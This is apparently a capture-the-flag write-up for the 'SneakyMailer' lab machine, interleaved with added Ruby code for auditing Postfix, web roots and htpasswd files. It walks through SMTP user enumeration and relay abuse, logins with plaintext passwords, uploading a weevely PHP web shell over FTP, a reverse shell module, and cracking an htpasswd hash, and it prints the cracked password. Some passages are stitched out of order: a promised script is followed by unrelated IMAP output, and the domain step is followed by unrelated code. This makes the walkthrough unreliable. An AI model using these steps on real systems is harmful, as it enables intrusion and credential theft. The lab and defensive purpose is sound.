```
# Nmap 7.80 scan initiated Sun Nov 8 16:50:55 2020 as: nmap -sSVC -p- -oA nmap_full -v 10.10.10.197
Nmap scan report for 10.10.10.197
Host is up (0.022s latency).
Not shown: 65528 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 57:c9:00:35:36:56:e6:6f:f6:de:86:40:b2:ee:3e:fd (RSA)
|   256 d8:21:23:28:1d:b8:30:46:e2:67:2d:59:65:f0:0a:05 (ECDSA)
|_  256 5e:4f:23:4e:d4:90:8e:e9:5e:89:74:b3:19:0c:fc:1a (ED25519)
25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
80/tcp   open  http     nginx 1.14.2
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://sneakycorp.htb
143/tcp  open  imap     Courier Imapd (released 2018)
|_imap-capabilities: THREAD=ORDEREDSUBJECT IMAP4rev1 IDLE THREAD=REFERENCES SORT ENABLE ACL2=UNION UIDPLUS STARTTLS completed ACL CHILDREN UTF8=ACCEPTA0001 NAMESPACE OK QUOTA CAPABILITY
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after:  2021-05-14T17:14:21
| MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Courier Imapd (released 2018)
|_imap-capabilities: THREAD=ORDEREDSUBJECT IMAP4rev1 IDLE THREAD=REFERENCES SORT ENABLE ACL2=UNION UIDPLUS completed ACL CHILDREN UTF8=ACCEPTA0001 AUTH=PLAIN NAMESPACE OK QUOTA CAPABILITY
| ssl-cert: Subject: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Subject Alternative Name: email:postmaster@example.com
| Issuer: commonName=localhost/organizationName=Courier Mail Server/stateOrProvinceName=NY/countryName=US
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-14T17:14:21
| Not valid after:  2021-05-14T17:14:21
| MD5:   3faf 4166 f274 83c5 8161 03ed f9c2 0308
|_SHA-1: f79f 040b 2cd7 afe0 31fa 08c3 b30a 5ff5 7b63 566c
|_ssl-date: TLS randomness does not represent time
8080/tcp open  http     nginx 1.14.2
| http-methods:
|_  Supported Methods: GET HEAD
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.14.2
|_http-title: Welcome to nginx!
Service Info: Host: debian; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 8 16:51:55 2020 -- 1 IP address (1 host up) scanned in 60.40 seconds
```
We can see there is a redirect from the web server on port 80 to http://sneakycorp.htb,
so let's add this local domain to /etc/hosts:
```ruby
cells.each do |c|
  # match on the cell's text: Regexp#match? needs a String, not a Nokogiri node
  puts c.text if /@sneakymailer.htb/.match?(c.text)
end
```

```
$ ruby grab_email.rb > emails.txt
```
If we want to verify all the email addresses, we can re-use the Rubyfu SMTP enumeration script and modify it a bit:
```ruby
#!/usr/bin/env ruby
require 'socket'

users = File.read('emails.txt').split("\n")
found = []

@s = TCPSocket.new('sneakycorp.htb', 25)
@banner = @s.recv(1024).chomp
users.each do |user|
  # SMTP commands are terminated by CRLF
  @s.send "VRFY #{user}\r\n", 0
  resp = @s.recv(1024).chomp
  # Postfix answers "252 2.0.0 <address>" for an address it accepts
  found << user if resp.split[2] == user
end
@s.close

puts found
```
We can use another Nmap script to verify the available SMTP commands:
```
$ nmap --script smtp-commands.nse -pT:25 sneakycorp.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 19:03 CET
Nmap scan report for sneakycorp.htb (10.10.10.197)
Host is up (0.022s latency).

PORT   STATE SERVICE
25/tcp open  smtp
|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,

Nmap done: 1 IP address (1 host up) scanned in 10.36 seconds
```
There is another script to check for an open relay, but it doesn't work here (maybe because the anti-spam test targets nmap.scanme.org by default).
```
$ nmap --script smtp-open-relay.nse -p 25 sneakycorp.htb --script-args smtp-open-relay.to=tigernixon@sneakymailer.htb,smtp-open-relay.from=noraj@sneakymailer.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 19:09 CET
Nmap scan report for sneakycorp.htb (10.10.10.197)
Host is up (0.023s latency).

PORT   STATE SERVICE
25/tcp open  smtp
|_smtp-open-relay: Server doesn't seem to be an open relay, all tests failed

Nmap done: 1 IP address (1 host up) scanned in 29.45 seconds
```
Before going further, I checked that we can't read emails with the account we registered. The HackTricks IMAP syntax page was useful for that.
```
$ ncat sneakycorp.htb 143
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS ENABLE UTF8=ACCEPT] Courier-IMAP ready. Copyright 1998-2018 Double Precision, Inc. See COPYING for distribution information.
A1 LOGIN "noraj@sneakymailer.htb" "password"
A1 NO Login failed.
```
It seems the SMTP server is vulnerable to open relay:

> An SMTP server that works as an open relay is an email server that does not verify if the user is authorised to send email from the specified email address. Therefore, users would be able to send email originating from any third-party email address that they want.
```
$ ncat sneakycorp.htb 25
MA220 debian ESMTP Postfix (Debian/GNU)
MAIL from:noraj@sneakymailer.htb
250 2.1.0 Ok
RCPT to:tigernixon@sneakymailer.htb
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
hello open relay
.
250 2.0.0 Ok: queued as 4773E25011
```
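Both findings so far, VRFY user enumeration and the relay test, come down to Postfix configuration. As an added example (my own code, not part of the original writeup), here is a Ruby audit of a `main.cf` that checks the three parameters behind them: `disable_vrfy_command`, the relay restrictions (`smtpd_relay_restrictions`, or `smtpd_recipient_restrictions` on older setups) and `mynetworks`. The two configurations embedded in it are constructed samples, not the target's configuration.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original writeup): audit a Postfix main.cf for
# the two weaknesses seen above, VRFY user enumeration and unauthenticated relaying.

# Parse main.cf syntax: "key = value", "#" comments, and continuation lines
# that start with whitespace. Returns a Hash of parameter => value.
def parse_main_cf(text)
  params = {}
  last_key = nil
  text.each_line do |raw|
    line = raw.chomp
    next if line.strip.empty? || line.lstrip.start_with?('#')
    if line =~ /\A\s+/ && last_key
      params[last_key] = "#{params[last_key]} #{line.strip}".strip
    elsif line =~ /\A([\w.]+)\s*=\s*(.*)\z/
      last_key = $1
      params[last_key] = $2.strip
    end
  end
  params
end

# Return a list of findings (strings). An empty list means no issue was found.
def audit_postfix(text)
  p = parse_main_cf(text)
  findings = []

  # VRFY is enabled unless explicitly disabled; that is what the VRFY
  # enumeration script relies on.
  unless p.fetch('disable_vrfy_command', 'no').downcase == 'yes'
    findings << 'VRFY enabled: set disable_vrfy_command = yes to stop user enumeration'
  end

  # Relay policy: smtpd_relay_restrictions (Postfix >= 2.10) takes precedence;
  # older setups rely on smtpd_recipient_restrictions. When neither is set,
  # Postfix's built-in default already rejects unauthorised destinations.
  relay = p['smtpd_relay_restrictions'] || p['smtpd_recipient_restrictions']
  if relay
    terms = relay.split(/[\s,]+/)
    guard = terms.index('reject_unauth_destination') || terms.index('defer_unauth_destination')
    # An unconditional "permit" placed before the guard defeats it.
    permit = terms.index('permit')
    if guard.nil? || (permit && permit < guard)
      findings << "relay restrictions do not reject unauthorised destinations: #{relay}"
    end
  end

  # Trusting the whole Internet in mynetworks is the classic open-relay mistake.
  nets = p.fetch('mynetworks', '')
  if nets.split(/[\s,]+/).any? { |n| %w[0.0.0.0/0 ::/0].include?(n) }
    findings << "mynetworks trusts everyone: #{nets}"
  end

  findings
end

# Constructed sample configurations (not taken from the target host).
WEAK_CF = <<~'CF'
  # permissive main.cf
  myhostname = debian
  mynetworks = 127.0.0.0/8, 0.0.0.0/0
  smtpd_recipient_restrictions = permit_mynetworks,
      permit
CF

HARDENED_CF = <<~'CF'
  myhostname = debian
  disable_vrfy_command = yes
  mynetworks = 127.0.0.0/8 [::1]/128
  smtpd_relay_restrictions = permit_mynetworks
      permit_sasl_authenticated
      reject_unauth_destination
CF

if __FILE__ == $0
  [['weak', WEAK_CF], ['hardened', HARDENED_CF]].each do |name, cf|
    puts "== #{name} =="
    audit_postfix(cf).each { |f| puts "  - #{f}" }
  end
end
```

Running it prints three findings for the weak sample and none for the hardened one. The ordering check matters in practice: Postfix evaluates restriction lists left to right, so a `permit` that appears before `reject_unauth_destination` turns an otherwise correct list into a relay.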
I wrote a script that abuses the SMTP open relay to send a test email to all users:
```
$ ncat sneakycorp.htb 143
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS ENABLE UTF8=ACCEPT] Courier-IMAP ready. Copyright 1998-2018 Double Precision, Inc. See COPYING for distribution information.
A1 LOGIN "paulbyrd@sneakymailer.htb" "^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht"
A1 NO Login failed.
^C
```

```
$ ncat sneakycorp.htb 143
* OK [CAPABILITY IMAP4rev1 UIDPLUS CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA IDLE ACL ACL2=UNION STARTTLS ENABLE UTF8=ACCEPT] Courier-IMAP ready. Copyright 1998-2018 Double Precision, Inc. See COPYING for distribution information.
A1 LOGIN "paulbyrd" "^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht"
* OK [ALERT] Filesystem notification initialization error -- contact your mail administrator (check for configuration errors with the FAM/Gamin library)
A1 OK LOGIN Ok.
A1 LIST "" *
* LIST (\Unmarked \HasChildren) "." "INBOX"
* LIST (\HasNoChildren) "." "INBOX.Trash"
* LIST (\HasNoChildren) "." "INBOX.Sent"
* LIST (\HasNoChildren) "." "INBOX.Deleted Items"
* LIST (\HasNoChildren) "." "INBOX.Queue"
* LIST (\HasNoChildren) "." "INBOX.Sent Items"
* LIST (\HasNoChildren) "." "INBOX.Drafts"
A1 OK LIST completed
```
I tried to connect to the IMAP server with Thunderbird and Kube, but it wasn't working; when I tried with Evolution, it worked.
```
$ ftp sneakycorp.htb
Connected to sneakycorp.htb.
220 (vsFTPd 3.0.3)
Name (sneakycorp.htb:noraj): developer
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    8 0        1001         4096 Nov 08 15:39 dev
226 Directory send OK.
ftp> ls dev
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 May 26 18:52 css
drwxr-xr-x    2 0        0            4096 May 26 18:52 img
-rwxr-xr-x    1 0        0           13742 Jun 23 08:44 index.php
drwxr-xr-x    3 0        0            4096 May 26 18:52 js
drwxr-xr-x    2 0        0            4096 May 26 18:52 pypi
drwxr-xr-x    4 0        0            4096 May 26 18:52 scss
-rwxr-xr-x    1 0        0           26523 May 26 19:58 team.php
drwxr-xr-x    8 0        0            4096 May 26 18:52 vendor
226 Directory send OK.
```
Before uploading a PHP web shell, let's craft one:

```
$ weevely generate noraj agent.php
Generated 'agent.php' with password 'noraj' of 744 byte size.
```

Then let's upload it:

```
ftp> cd dev
250 Directory successfully changed.
ftp> put agent.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
744 bytes sent in 6.3e-05 seconds (11.3 Mbytes/s)
```
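The upload works because the developer FTP account can write straight into the web root. As an added example (my own code, not part of the original writeup), here is a Ruby baseline check a defender can run against a web root: it hashes every file, diffs the result against a saved manifest and reports PHP files that appeared or changed, which is exactly what a dropped `agent.php` looks like. The directory layout and file contents are constructed in a temporary directory; the `demo` function and its paths are assumptions for the example, not files on the box.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original writeup): detect files dropped into a
# web root, such as a PHP web shell uploaded over FTP, by comparing the tree
# against a baseline manifest of SHA-256 digests.
require 'digest'
require 'fileutils'
require 'tmpdir'

# Build a manifest: relative path => SHA-256 of content, for every regular file
# (dotfiles included, since .htaccess tampering is just as interesting).
def build_manifest(root)
  manifest = {}
  Dir.glob('**/*', File::FNM_DOTMATCH, base: root).sort.each do |rel|
    path = File.join(root, rel)
    next unless File.file?(path)
    manifest[rel] = Digest::SHA256.file(path).hexdigest
  end
  manifest
end

# Compare the current tree with a baseline. Returns added, removed and
# modified relative paths.
def diff_manifest(baseline, current)
  added    = current.keys - baseline.keys
  removed  = baseline.keys - current.keys
  modified = (baseline.keys & current.keys).select { |k| baseline[k] != current[k] }
  { added: added.sort, removed: removed.sort, modified: modified.sort }
end

# Added or modified server-side scripts are what a web shell drop looks like.
def suspicious_php(diff)
  (diff[:added] + diff[:modified]).select { |p| p.end_with?('.php', '.phtml', '.phar') }
end

# Replay the scenario in a constructed temporary web root: take a baseline,
# then "upload" a new PHP file and tamper with an existing one.
def demo
  Dir.mktmpdir('webroot') do |root|
    FileUtils.mkdir_p(File.join(root, 'dev/css'))
    File.write(File.join(root, 'dev/index.php'), "<?php echo 'hello'; ?>\n")
    File.write(File.join(root, 'dev/css/style.css'), "body {}\n")
    baseline = build_manifest(root)

    File.write(File.join(root, 'dev/agent.php'), "<?php /* constructed placeholder */ ?>\n")
    File.write(File.join(root, 'dev/index.php'), "<?php echo 'hello'; include 'x'; ?>\n")

    diff = diff_manifest(baseline, build_manifest(root))
    return suspicious_php(diff)
  end
end

puts demo.inspect if __FILE__ == $0
```

In a real deployment the baseline manifest is written at deploy time and stored outside the web root, and the comparison runs from cron or a file-integrity agent; a new `.php` in a directory that is writable by an FTP or upload account is the alert worth paging on.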
Then let's connect to our webshell and use the backdoor_reversetcp module to get a reverse shell, because the webshell is quickly removed from the server:
There are 2 users excluding root that have a shell: low & developer.
Let's try the dev creds:

```
$ su developer
Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C
id
uid=1001(developer) gid=1001(developer) groups=1001(developer)
```

But the home directory of developer is /var/www/dev.sneakycorp.htb, and the flag is not there.
We need to look elsewhere.
## Elevation of Privilege (EoP): from developer to low

```
ls -lh /home
total 8.0K
drwxr-xr-x 8 low   low   4.0K Jun  8 03:47 low
drwx------ 5 vmail vmail 4.0K May 19 21:10 vmail
ls -lhA /home/low
total 40K
lrwxrwxrwx 1 root root    9 May 19 21:09 .bash_history -> /dev/null
-rw-r--r-- 1 low  low   220 May 14 05:46 .bash_logout
-rw-r--r-- 1 low  low  3.5K May 14 05:46 .bashrc
drwxr-xr-x 3 low  low  4.0K May 16 03:34 .cache
drwx------ 3 low  low  4.0K May 14 13:21 .gnupg
drwxr-xr-x 3 low  low  4.0K May 16 03:37 .local
dr-x------ 2 low  low  4.0K May 16 03:30 .pip
-rw-r--r-- 1 low  low   807 May 14 05:46 .profile
drwxr-xr-x 2 low  low  4.0K Jun  8 03:47 .ssh
-rwxr-x--- 1 root low    33 Nov  9 10:36 user.txt
drwxr-xr-x 6 low  low  4.0K May 16 03:33 venv
```
We already saw 2 references to pypi; now there is a venv folder owned by low, and in /etc/passwd an account named pypi whose home folder is /var/www/pypi.sneakycorp.htb.
It seems the EoP will go through venv/pypi.
```
ls -lhA /var/www/pypi.sneakycorp.htb
total 12K
-rw-r--r-- 1 root root        43 May 15 14:29 .htpasswd
drwxrwx--- 2 root pypi-pkg  4.0K Nov  9 12:19 packages
drwxr-xr-x 6 root pypi      4.0K May 14 18:25 venv
```

```
$ haiti '$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/'
MD5(APR) [HC: 1600]
Apache MD5 [HC: 1600]
```

```
$ john hash.txt --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=md5crypt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
soufianeelhaoui  (pypi)
1g 0:00:00:27 DONE (2020-11-09 21:36) 0.03652g/s 130543p/s 130543c/s 130543C/s souhegan..souderton0
Use the "--show" option to display all of the cracked passwords reliably
Session complete
```
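The .htpasswd entry falls in under 30 seconds because `$apr1$` is salted MD5, which john tests at over 130k candidates per second on four CPU threads, as the session above shows. As an added example (my own code, not part of the original writeup), here is a Ruby audit that parses an htpasswd file and flags the weak schemes Apache still accepts. The pypi line is the hash from the box; every other entry in the sample is a constructed placeholder, not a real digest.

```ruby
#!/usr/bin/env ruby
# Added example (not from the original writeup): audit an Apache .htpasswd file
# for weak hashing schemes and malformed or duplicated entries.

# Classify one htpasswd hash field into [scheme, parameter, verdict].
# Apache formats: "$apr1$salt$hash" (salted MD5), "$2y$cost$..." (bcrypt),
# "{SHA}base64" (unsalted SHA-1), 13-char DES crypt, or plain text.
# The parameter is the bcrypt cost, or the salt length for the others.
def classify_hash(field)
  case field
  when /\A\$2[aby]\$(\d{2})\$[.\/A-Za-z0-9]{53}\z/
    cost = $1.to_i
    [:bcrypt, cost, cost >= 10 ? :ok : :weak_cost]
  when /\A\$apr1\$([.\/A-Za-z0-9]{1,8})\$[.\/A-Za-z0-9]{22}\z/
    [:apr1_md5, $1.length, :weak]
  when /\A\{SHA\}[A-Za-z0-9+\/]{27}=\z/
    [:sha1_unsalted, 0, :weak]
  when /\A[.\/A-Za-z0-9]{13}\z/
    [:des_crypt, 2, :weak]
  else
    [:plaintext_or_unknown, 0, :weak]
  end
end

# Parse "user:hash" lines and return a list of findings (strings).
def audit_htpasswd(text)
  findings = []
  seen = Hash.new(0)
  text.each_line.with_index(1) do |raw, n|
    line = raw.chomp
    next if line.empty? || line.start_with?('#')
    user, field = line.split(':', 2)
    if field.nil? || field.empty?
      findings << "line #{n}: malformed entry"
      next
    end
    seen[user] += 1
    scheme, param, verdict = classify_hash(field)
    next if verdict == :ok
    detail = scheme == :bcrypt ? "cost #{param}" : "salt length #{param}"
    findings << "line #{n}: #{user} uses #{scheme}, #{detail} (#{verdict})"
  end
  seen.each { |u, c| findings << "user #{u} appears #{c} times" if c > 1 }
  findings
end

# Constructed sample file. Only the pypi hash is the real value from the box;
# the bcrypt and {SHA} fields are format-valid placeholders, not real digests.
SAMPLE = <<~'HT'
  pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/
  admin:$2y$12$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0
  ops:$2y$04$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0
  legacy:{SHA}ABCDEFGHIJKLMNOPQRSTUVWXYZa=
  guest:guest
  guest:guest
  broken
HT

audit_htpasswd(SAMPLE).each { |f| puts f } if __FILE__ == $0
```

The fix on the server side is to regenerate entries with bcrypt (`htpasswd -B`), which is why the audit only treats bcrypt as acceptable, and only at a cost of 10 or more; a bcrypt hash with a very low cost gives back most of the margin that makes it slower to crack than `$apr1$`.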
```
low@sneakymailer:~$ sudo -l
sudo: unable to resolve host sneakymailer: Temporary failure in name resolution
Matching Defaults entries for low on sneakymailer:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User low may run the following commands on sneakymailer:
    (root) NOPASSWD: /usr/bin/pip
```